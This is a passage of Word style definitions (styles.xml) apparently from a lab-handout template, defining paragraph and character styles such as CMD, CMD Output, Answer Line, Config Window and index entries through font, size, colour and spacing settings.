    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Annotationtext"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="000b2344"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="CommentSubjectChar" w:customStyle="1">
    <w:name w:val="Comment Subject Char"/>
    <w:link w:val="Annotationsubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="000b2344"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading4Char" w:customStyle="1">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:qFormat/>
    <w:rsid w:val="007c09d1"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:bCs/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz w:val="6"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading5Char" w:customStyle="1">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:qFormat/>
    <w:rsid w:val="00bf76be"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading6Char" w:customStyle="1">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:qFormat/>
    <w:rsid w:val="00bf76be"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading7Char" w:customStyle="1">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading7"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00bf76be"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading8Char" w:customStyle="1">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading8"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00bf76be"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading9Char" w:customStyle="1">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00bf76be"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading3Char" w:customStyle="1">
    <w:name w:val="Heading 3 Char"/>
    <w:link w:val="Heading3"/>
    <w:qFormat/>
    <w:rsid w:val="00d531d0"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="EndnoteTextChar" w:customStyle="1">
    <w:name w:val="Endnote Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Endnote"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00231dca"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FootnoteTextChar" w:customStyle="1">
    <w:name w:val="Footnote Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footnote"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00231dca"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="MacroTextChar" w:customStyle="1">
    <w:name w:val="Macro Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Macro"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00231dca"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BodyTextChar" w:customStyle="1">
    <w:name w:val="Body Text Char"/>
    <w:qFormat/>
    <w:rsid w:val="00603503"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CMDChar" w:customStyle="1">
    <w:name w:val="CMD Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CMD"/>
    <w:qFormat/>
    <w:rsid w:val="0010436e"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BodyTextBoldChar" w:customStyle="1">
    <w:name w:val="Body Text Bold Char"/>
    <w:basedOn w:val="BodyTextChar"/>
    <w:link w:val="BodyTextBold"/>
    <w:qFormat/>
    <w:rsid w:val="00c73e03"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
      <w:b/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="TitleChar" w:customStyle="1">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:qFormat/>
    <w:rsid w:val="00a33890"/>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PlaceholderText">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00fa154b"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CMDRedChar" w:customStyle="1">
    <w:name w:val="CMD Red Char"/>
    <w:basedOn w:val="CMDChar"/>
    <w:link w:val="CMDRed"/>
    <w:qFormat/>
    <w:rsid w:val="00490807"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:color w:val="EE0000"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BodyTextL25Char" w:customStyle="1">
    <w:name w:val="Body Text L25 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyTextL25"/>
    <w:qFormat/>
    <w:rsid w:val="00490807"/>
    <w:rPr>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CMDOutputChar" w:customStyle="1">
    <w:name w:val="CMD Output Char"/>
    <w:basedOn w:val="BodyTextL25Char"/>
    <w:link w:val="CMDOutput"/>
    <w:qFormat/>
    <w:rsid w:val="00490807"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CMDOutputRedChar" w:customStyle="1">
    <w:name w:val="CMD Output Red Char"/>
    <w:basedOn w:val="CMDOutputChar"/>
    <w:link w:val="CMDOutputRed"/>
    <w:qFormat/>
    <w:rsid w:val="00490807"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:color w:val="EE0000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="InternetLink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003f306a"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003f306a"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:fill="E1DFDD" w:val="clear"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="VisitedInternetLink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003f306a"/>
    <w:rPr>
      <w:color w:val="800080"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603503"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>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AnswerLineL25" w:customStyle="1">
    <w:name w:val="Answer Line L25"/>
    <w:basedOn w:val="BodyTextL25"/>
    <w:next w:val="BodyTextL25"/>
    <w:qFormat/>
    <w:rsid w:val="007c09d1"/>
    <w:pPr/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="PageHead" w:customStyle="1">
    <w:name w:val="Page Head"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00c52ba6"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="18" w:space="1" w:color="000000"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="right" w:pos="10080" w:leader="none"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="AnswerLineL50" w:customStyle="1">
    <w:name w:val="Answer Line L50"/>
    <w:basedOn w:val="AnswerLineL25"/>
    <w:next w:val="BodyTextL50"/>
    <w:qFormat/>
    <w:rsid w:val="00e859e3"/>
    <w:pPr>
      <w:ind w:left="720" w:hanging="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HeaderandFooter">
    <w:name w:val="Header and Footer"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="Header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008402f2"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="center" w:pos="4680" w:leader="none"/>
        <w:tab w:val="right" w:pos="9360" w:leader="none"/>
      </w:tabs>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="Footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00e859e3"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="left" w:pos="6570" w:leader="none"/>
        <w:tab w:val="right" w:pos="10080" w:leader="none"/>
        <w:tab w:val="right" w:pos="10800" w:leader="none"/>
      </w:tabs>
      <w:spacing w:lineRule="auto" w:line="240" w:before="60" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0090659a"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="60" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableText" w:customStyle="1">
    <w:name w:val="Table Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TableTextChar"/>
    <w:qFormat/>
    <w:rsid w:val="008b68e7"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableContents">
    <w:name w:val="Table Contents"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableHeading" w:customStyle="1">
    <w:name w:val="Table Heading"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00097163"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:spacing w:before="120" w:after="120"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bulletlevel1" w:customStyle="1">
    <w:name w:val="Bullet level 1"/>
    <w:basedOn w:val="BodyTextL25"/>
    <w:qFormat/>
    <w:rsid w:val="00457934"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bulletlevel2" w:customStyle="1">
    <w:name w:val="Bullet level 2"/>
    <w:basedOn w:val="BodyTextL25"/>
    <w:qFormat/>
    <w:rsid w:val="0036440c"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:ind w:left="1080" w:hanging="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="InstNoteRed" w:customStyle="1">
    <w:name w:val="Inst Note Red"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00d030ae"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="EE0000"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ConfigWindow" w:customStyle="1">
    <w:name w:val="Config Window"/>
    <w:basedOn w:val="TextBody"/>
    <w:next w:val="BodyTextL25"/>
    <w:qFormat/>
    <w:rsid w:val="007c09d1"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz w:val="6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="SubStepAlpha" w:customStyle="1">
    <w:name w:val="SubStep Alpha"/>
    <w:basedOn w:val="BodyTextL25"/>
    <w:qFormat/>
    <w:rsid w:val="00a76665"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="4"/>
      </w:numPr>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CMD" w:customStyle="1">
    <w:name w:val="CMD"/>
    <w:basedOn w:val="BodyTextL25"/>
    <w:link w:val="CMDChar"/>
    <w:qFormat/>
    <w:rsid w:val="0010436e"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60"/>
      <w:ind w:left="720" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextL50" w:customStyle="1">
    <w:name w:val="Body Text L50"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00166253"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="120" w:after="120"/>
      <w:ind w:left="720" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextL25" w:customStyle="1">
    <w:name w:val="Body Text L25"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextL25Char"/>
    <w:qFormat/>
    <w:rsid w:val="00d778df"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="120" w:after="120"/>
      <w:ind w:left="360" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="InstNoteRedL50" w:customStyle="1">
    <w:name w:val="Inst Note Red L50"/>
    <w:basedOn w:val="InstNoteRed"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00d030ae"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>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qFormat/>
    <w:rsid w:val="00c44db7"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="DocumentMap">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="DocumentMapCh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BodyTextL25"/>
    <w:qFormat/>
    <w:rsid w:val="00a76665"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="4"/>
      </w:numPr>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CMDOutput" w:customStyle="1">
    <w:name w:val="CMD Output"/>
    <w:basedOn w:val="BodyTextL25"/>
    <w:link w:val="CMDOutputChar"/>
    <w:qFormat/>
    <w:rsid w:val="00cb2fc9"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60"/>
      <w:ind w:left="720" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="InstNoteRedL25" w:customStyle="1">
    <w:name w:val="Inst Note Red L25"/>
    <w:basedOn w:val="BodyTextL25"/>
    <w:next w:val="BodyTextL25"/>
    <w:qFormat/>
    <w:rsid w:val="00d030ae"/>
    <w:pPr/>
    <w:rPr>
      <w:color w:val="EE0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextL25Bold" w:customStyle="1">
    <w:name w:val="Body Text L25 Bold"/>
    <w:basedOn w:val="BodyTextL25"/>
    <w:qFormat/>
    <w:rsid w:val="00ac507d"/>
    <w:pPr/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00c6495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sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Annotationtext">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="000b2344"/>
    <w:pPr/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Annotationsubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="Annotationtext"/>
    <w:next w:val="Annotationtext"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="000b2344"/>
    <w:pPr/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ReflectionQ" w:customStyle="1">
    <w:name w:val="Reflection Q"/>
    <w:basedOn w:val="BodyTextL25"/>
    <w:qFormat/>
    <w:rsid w:val="00270fcc"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="3"/>
      </w:numPr>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Endnote">
    <w:name w:val="Endnote Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="EndnoteTextChar"/>
    <w:semiHidden/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footnote">
    <w:name w:val="Footnote Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FootnoteTextChar"/>
    <w:semiHidden/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index1">
    <w:name w:val="index 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:left="240" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index2">
    <w:name w:val="index 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:left="480" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index3">
    <w:name w:val="index 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:left="720" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index4">
    <w:name w:val="index 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:left="960" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index5">
    <w:name w:val="index 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:left="1200" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index6">
    <w:name w:val="index 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:left="1440" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index7">
    <w:name w:val="index 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:left="1680" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index8">
    <w:name w:val="index 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:left="1920" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index9">
    <w:name w:val="index 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:left="2160" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Indexheading">
    <w:name w:val="index heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Index1"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Macro">
    <w:name w:val="macro"/>
    <w:link w:val="MacroTextChar"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00231dc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urier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
      <w:color w:val="auto"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Tableofauthorities">
    <w:name w:val="table of authorities"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:left="240" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
